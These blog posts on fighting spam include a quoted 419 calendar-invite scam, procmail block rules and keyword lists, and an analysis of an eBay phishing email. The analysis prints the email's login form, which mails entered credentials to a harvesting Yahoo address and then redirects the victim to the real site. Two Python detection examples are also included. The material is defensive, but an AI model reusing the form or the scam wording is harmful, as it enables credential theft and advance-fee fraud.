spam
Event spam
I received a new kind of spam today in my gmail account. It is an event invitation to participate in a 419 African deposit scam and apparently get my identity stolen in the process. Since I read my gmail in Thunderbird and have the Lightning add-on installed, all I needed to do was hit the accept button on the invitation to blast a message of receipt to the spammer. Now, I'll find out how to report this new spam type.
David Norman, you are invited to
Title: NOTIFICATION OF REQUEST
Time: Mon Mar 17 15:00 - 16:00 (Timezone: Eastern Time)
Calendar: David Norman
Description: Dear Friend,I want you to assist me and my partner to receive a package which we are working on how to move it out of our country down to your country,and we promise to give you 30% of the package.
We only need: (1) Your full name (2) Your address (3) Mobile Telephone number (4) Your international passport number or Photograph for us to make the deposit with your name.
The flight will be living with the package this weekend that is why we need your assistance for us to make sure the package live immediately.
The content of the package is $15 million U.S dollars our company Sell Bloc, Crude Oil want to send this money to our customers in Europe through a security company and it was declare personal effect. We want to divert the money to you so that we all will shear it,So we want you to send us the needed information for us to deposit the money with your name to the security company that will be living with the package.
Please we are sorry if we have offended you for the assistance,but we believe the business will change our life. I wait your reply with the information so that we will deposit it with your name as the rightful beneficiary and after that we give you the: Goods Number, Code,The Tracking Number.
Hoping to hear from you.
Thanks and God bless us,
Dr.Graham Douglas
You can view this event at http://www.google.com/calendar/event?action=VIEW&eid=dGVvcnNodWxtOG1pYm1...
You can also view your calendar at http://www.google.com/calendar/
You are receiving this email at the account x@gmail.com because you are subscribed for invitations on calendar David Norman.
To stop receiving these notifications, please log in to http://www.google.com/calendar/ and change your notification settings for this calendar.
procmail spam rules
# $HOME/.procmailrc
#
# Maildir delivery
#
# (maildir = one file for each message, no locking needed for delivery)
#
# (The following lines are needed as sendmail only can handle mbox delivery.
# Procmail will take care of the maildir delivery with these lines.)
#
DEFAULT=$HOME/Maildir/
#
# Change to this directory
#
MAILDIR=$DEFAULT

# Logging
#
#VERBOSE=no
# Logfile format: procmail_log_2004.06.11
LOGFILE=$HOME/logs/procmail_log_`date "+%Y.%m.%d"`

# Forward everything to spamassassin
# The condition line ensures that only messages smaller than 250 kB
# (250 * 1024 = 256000 bytes) are processed by SpamAssassin. Most spam
# isn't bigger than a few k and working with big messages can bring
# SpamAssassin to its knees.
#
# The lock file ensures that only 1 spamassassin invocation happens
# at 1 time, to keep the load down.
#
# Uncomment the next 3 lines to enable spam tagging
# In my particular case, the spam is already filtered
# by a central mail server, so a second SA scan is redundant
#:0fw:spam.lockfile
#* < 256000
#| /usr/local/bin/spamc -d localhost

# SpamAssassin really thinks this is spam
:0
* ^X-Spam-Level: \*\*\*\*\*\*\*\*\*\*\*\*\*\*
/dev/null

# Mail that passed through, or claims to come from, these country TLDs
:0
* ^(Received|From):.*\.(kr|hu|tw|br|ru|cn|jp|pt|cz|cl|ro)\>
/dev/null

# Note: the Received: patterns below key on the leading octets only, so
# each of them covers more address space than the netblock named in its
# comment (a whole /16, or a whole /8 for the 211. rule).

# CHINANET Hebei province 202.99.128.0 - 202.99.191.255 [202.99.183.163]) wide
:0
* ^Received:.*202\.99\.[0-9]+\.[0-9]+
/dev/null

# CHINANET Beijing province network 202.108.0.0 - 202.108.255.255 .163.com ([202.108.44.203] [202.108.44.205]
:0
* ^Received:.*202\.108\.[0-9]+\.[0-9]+
/dev/null

# CHINANET Guangdong province network 202.103.128.0 - 202.103.191.255 netease.com ([202.103.134.9] wide
:0
* ^Received:.*202\.103\.[0-9]+\.[0-9]+
/dev/null

# China Telecom Shanghai 61.169.0.0 - 61.171.255.255 [61.170.130.217]
:0
* ^Received:.*\[61\.(169|17[0-1])\.[0-9]+\.[0-9]+
/dev/null

# Development Research Center of the
# State Council of China
:0
* ^Received:.*202\.106\.171\.[0-9]+
/dev/null

# CHINANET Jiangsu province network
# Data Communication Division
# China Telecom 61.132.0.0 - 61.132.127.255 wide
:0
* ^Received:.*\[61\.132\.[0-9]+\.[0-9]+
/dev/null

# Korea Network Information Center 203.232.0.0 - 203.239.255.255 websrv.pakatex.com ([203.233.4.2]) AdAd NY
:0
* ^Received:.*203\.23[2-9]\.[0-9]+\.[0-9]+
/dev/null

# Korea Network Information Center
# 211.32.0.0 - 211.39.255.255
# 211.40.0.0 - 211.41.255.255
# 211.41.0.0 - 211.51.255.255
# 211.52.0.0 - 211.63.255.255
#
# 211.168.0.0 - 211.171.255.255
# 211.172.0.0 - 211.199.255.255
#(aussie blocks in between)
:0
* ^Received:.*211\.[0-9]+\.[0-9]+\.[0-9]+
/dev/null

# Keyword recipes. H = match the header, B = match the body. Procmail matches
# case-insensitively by default, and the \< \> word boundaries keep e.g.
# "cum" from matching "document" or "anal" from matching "analysis" and
# sending legitimate mail to /dev/null.

# drugs
:0 HB
* \<(accutane|allegra|allergy|ambien|cialis|cipro|codeine|coumadin|diazepam|effexor|herbal|hydroxycut|levitra|lexapro|MEDFEST|migrane|norvasc|oxycontin|paxil|phentermin|propecia|prozac|valium|xan(a|e)x|xenical|zyban|pharmac(y|ies)|ritalin|tramadol|(V|v)(i|1|ii)(a|@)gr(a|@)|zocor|zoloft|zyrtec)\>
/dev/null

# sex
:0 HB
* \<(anal|blowjob|bondage|c(o|0)ck|cum|erection|fuck|impotenc(e|y|ey)|masturbat(e|ion)|(o|0)rgy|pen(i|1)s|pussy|xxx)\>
/dev/null

# finance
:0 HB
* \<(Benin|c(a|@)s(i|1)n(o|0)|Nigeria|refinanc(e|ing|ment)|rep(l|1|\|)(i|1)ca|rolex)\>
/dev/null

# Acknowledgements from spamcop.net for reports already submitted
:0 H
* ^From:.*spamcop\@devnull.spamcop.net
* ^Subject:.*has accepted.*emails for processing
/dev/null

# Borderline words: file in the Junk folder rather than discarding
:0 HB
* \<(Amsterdam|blackjack|boob|breast|dick|fetish|girth|huss(ies|y)|inch|lesbian|nude|pills|poker|p(o|0)rn|(O|0)EM|remit|tits)\>
.Junk/

# Charsets I never receive legitimate mail in. Conditions in a procmail
# recipe are ANDed, so each one is given a score of 1^0 here: the recipe
# fires as soon as any single condition matches.
:0:
* 1^0 ^Content-Type:.*charset="(.*big5|iso-2022-jp|ISO-2022-KR|euc-kr|gb2312|ks_c_5601-1987|windows-1251|windows-1256)
* 1^0 ^Content-Type: .*ks_c_5601-1987
* 1^0 ^Content-Type: .*[gG][bB]2312
* 1^0 ^Subject: \=\?GB2312\?.*
* 1^0 ^Subject: \=\?big5\?.*
* 1^0 ^Content-Type: text/html; charset=euc-kr
* 1^0 ^Content-Type: text/html; charset="euc-kr"
* 1^0 ^Subject: \[[gG][bB]2312\].*
* 1^0 ^Subject: \[[Bb]ig5\].*
.Junk/

# Move Spam Assassin flagged mails to the SPAM folder inside your INBOX
# (format for Maildir is .foldername/ or .foldername.subfoldername/)
# The next recipe files spam with a score of 5 or more into a dedicated spam folder
:0:
* ^X-Spam-Flag: YES
* ^X-Spam-Level: \*\*\*\*\*
.Junk/

# Everything not processed yet goes into the normal inbox (DEFAULT)
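The header recipes above can be replayed outside procmail to see what they really match. The following Python is an added example, not part of the original .procmailrc: it expands three of the netblocks exactly as the recipe comments state them, compares them with the leading-octet regexes the recipes use, and applies the X-Spam-Level thresholds. The sample headers are constructed, and the 14-star drop threshold is read off the first /dev/null recipe.

```python
import ipaddress
import re
from email import message_from_string

# Netblocks exactly as the recipe comments state them (start - end form),
# expanded to CIDR so a Received: IP can be checked against the real range.
STATED_RANGES = [("202.99.128.0", "202.99.191.255"),   # CHINANET Hebei
                 ("61.169.0.0", "61.171.255.255"),     # China Telecom Shanghai
                 ("203.232.0.0", "203.239.255.255")]   # KRNIC
NETWORKS = [net for start, end in STATED_RANGES
            for net in ipaddress.summarize_address_range(
                ipaddress.ip_address(start), ipaddress.ip_address(end))]
# The patterns those three recipes actually use; they key on leading octets only.
RECIPE_REGEXES = [re.compile(r"202\.99\.[0-9]+\.[0-9]+"),
                  re.compile(r"\[61\.(169|17[0-1])\.[0-9]+\.[0-9]+"),
                  re.compile(r"203\.23[2-9]\.[0-9]+\.[0-9]+")]
BRACKETED_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
DROP_STARS = 14  # length of the star run in the first /dev/null recipe

def received_ips(msg):
    """IPv4 addresses written as [a.b.c.d] in every Received: header."""
    return [ipaddress.ip_address(ip) for hdr in msg.get_all("Received", [])
            for ip in BRACKETED_IP.findall(hdr)]

def in_stated_netblocks(msg):
    return any(ip in net for ip in received_ips(msg) for net in NETWORKS)

def regex_vs_range(raw):
    """(recipe pattern matched, IP truly inside a stated block) for one message."""
    msg = message_from_string(raw)
    hit = any(rx.search(h) for h in msg.get_all("Received", []) for rx in RECIPE_REGEXES)
    return hit, in_stated_netblocks(msg)

def spam_stars(msg):
    """SpamAssassin writes one '*' per point of score into X-Spam-Level."""
    return (msg.get("X-Spam-Level") or "").count("*")

def classify(raw):
    """Replay the header recipes top to bottom; first match wins, as in procmail."""
    msg = message_from_string(raw)
    if spam_stars(msg) >= DROP_STARS or in_stated_netblocks(msg):
        return "/dev/null"
    if msg.get("X-Spam-Flag") == "YES" and spam_stars(msg) >= 5:
        return ".Junk/"
    return "inbox"

# Constructed sample headers (not real mail). The first IP lies inside the
# stated Hebei block; the second is in 202.99.0.0/16 but outside that block.
INSIDE = "Received: from relay ([202.99.183.163])\nSubject: test\n\nbody\n"
OUTSIDE = "Received: from relay ([202.99.10.1])\nSubject: test\n\nbody\n"
TAGGED = "X-Spam-Flag: YES\nX-Spam-Level: ******\nSubject: test\n\nbody\n"
```

regex_vs_range(OUTSIDE) returns (True, False): the recipe's regex would discard that message even though its relay sits outside the Hebei block the comment names.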
New Ebay phishing with forms
A new phishing scam for Ebay actually embeds the login form in the email so you can't even hover over the link to the site and see if it's a legit URL or not. Thunderbird tagged this email as a suspected scam, but I clicked the "not a scam" box to see what it actually looked like.
The key part of the login form shows that it not only submits through a third-party form processor that mails the login details to someone's Yahoo account, but also redirects you afterwards to the legitimate ebay.com sign-in page so you can actually log in and never notice. The form HTML looks like:
<FORM NAME="ContactForm" ACTION="http://webtools.gmti.com/cgi-bin/webforms.pl" METHOD="POST">
<INPUT TYPE=hidden NAME=mailto VALUE="hajerttyun@yahoo.com">
<INPUT TYPE=hidden NAME=mailsubject VALUE="Userutzu Si Parolutza">
<INPUT TYPE=hidden NAME=redirect VALUE="https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&pUserId=&co_partnerId=2&siteid=0&pageType=222&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BMember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dwjj67%26redirect%3D0%26de%3Doff&pp=&errmsg=8">
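A mail client or gateway can catch this trick without relying on the user hovering over anything. The Python below is an added example, not code from the original post: it parses an HTML mail body and flags any form whose action leaves the brand's domain, carries a hidden mailto relay field, or quietly redirects back to the real site. The sample form keeps the shape of the one quoted above but uses constructed example.net/example.com placeholders for the relay host and the harvesting mailbox.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormFinder(HTMLParser):
    """Collect every <form> in an HTML mail body with its action and hidden inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # HTMLParser lowercases tag names
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "hidden": {}})
        elif tag == "input" and self.forms and a.get("type", "").lower() == "hidden":
            self.forms[-1]["hidden"][a.get("name", "").lower()] = a.get("value", "")

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def on_brand(url, brand):
    h = host_of(url)
    return h == brand or h.endswith("." + brand)

def phishing_indicators(html, brand="ebay.com"):
    """Reasons a mail body looks like a credential-harvesting form for `brand`."""
    parser = FormFinder()
    parser.feed(html)
    reasons = []
    for form in parser.forms:
        if not on_brand(form["action"], brand):
            reasons.append(f"form posts to '{host_of(form['action'])}', not {brand}")
        mailto = form["hidden"].get("mailto")
        if mailto:
            reasons.append(f"form-to-mail relay copies the fields to {mailto}")
        if on_brand(form["hidden"].get("redirect", ""), brand):
            reasons.append("hidden redirect returns the victim to the real site")
    return reasons

# Constructed sample: same shape as the quoted form, placeholder relay and mailbox.
PHISH = ('<FORM NAME="ContactForm" ACTION="http://relay.example.net/cgi-bin/webforms.pl" METHOD="POST">'
         '<INPUT TYPE=hidden NAME=mailto VALUE="harvester@example.com">'
         '<INPUT TYPE=hidden NAME=redirect VALUE="https://signin.ebay.com/ws/eBayISAPI.dll?SignIn">'
         '<INPUT TYPE=text NAME=userid><INPUT TYPE=password NAME=pass></FORM>')
LEGIT = '<form action="https://signin.ebay.com/ws/eBayISAPI.dll?SignIn" method="post"></form>'
```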
Addresses to report spam
If you send me spam, I automatically turn around and forward it to the following addresses:
- spam@uce.gov
- spam@barracudanetworks.com
- reportspam@ipswitch.com
- submit@respam.com
- spam@sendusspam.com
- spam@mailpolice.com
- spam@mail-filters.com
- spam@postini.com
- spam@support.trendmicro.com
- junk@brightmail.com
- ...and my secret spamcop.net address
When it also involves phishing, I add the following:
- phishing-report@us-cert.gov
- scams@fraudwatchinternational.com
- reportphishing@antiphishing.org
- fraud@phishfraud.com
- Report@reportphish.org
Two of the most common spams I get are stock tips and cialis/viagra junk, so I forward those to enforcement@sec.gov and webcomplaints@ora.fda.gov respectively. The 419 Nigerian scams offering 12 million dollars of free money for just "borrowing" my checking account get forwarded to 419.fcd@usss.treas.gov, even though I don't think much can be done about them. If I'm in a particularly bad mood, I forward OEM/cheap software spam to piracy@microsoft.com, spamwatch@symantec.com, and/or piracy@adobe.com, since Symantec, Adobe, and Microsoft are almost always part of their catalog.
New! Blacklisting in Drupal troll module
I looked up some of the addresses of visitors to deekayen.net who've attempted to leave spam, whether it be referrer, comment, or contact form spam. About half of them were listed in the SPEWS.org Level 1 list. Naturally, I decided I needed to block those operations from messing with any of my sites. From SPEWS:
The majority of the Level 1 list is made up of netblocks owned by the spammers or spam support operations themselves, with few or no other legitimate customers detected.
Two days later, I committed support for the Drupal troll module to import the SPEWS Level 1 & 2 lists, and the okean.com lists of netblocks owned by China and Korea. What you can do to blacklisted visitors:
- add a random stutter of 1-5 seconds to the page output
- drop form POST submission data
- always send blank pages
- always send a 404 not found message
- always redirect to an alternate URL
Of course, there's a whitelist to make sure you don't lock yourself out of your own site, and you can look up IP addresses in a search form to see whether they fall inside any block on the blacklist. I don't have PostgreSQL to test support for that, but otherwise it just needs some peer review to get branched for DRUPAL-4-7 in CVS.

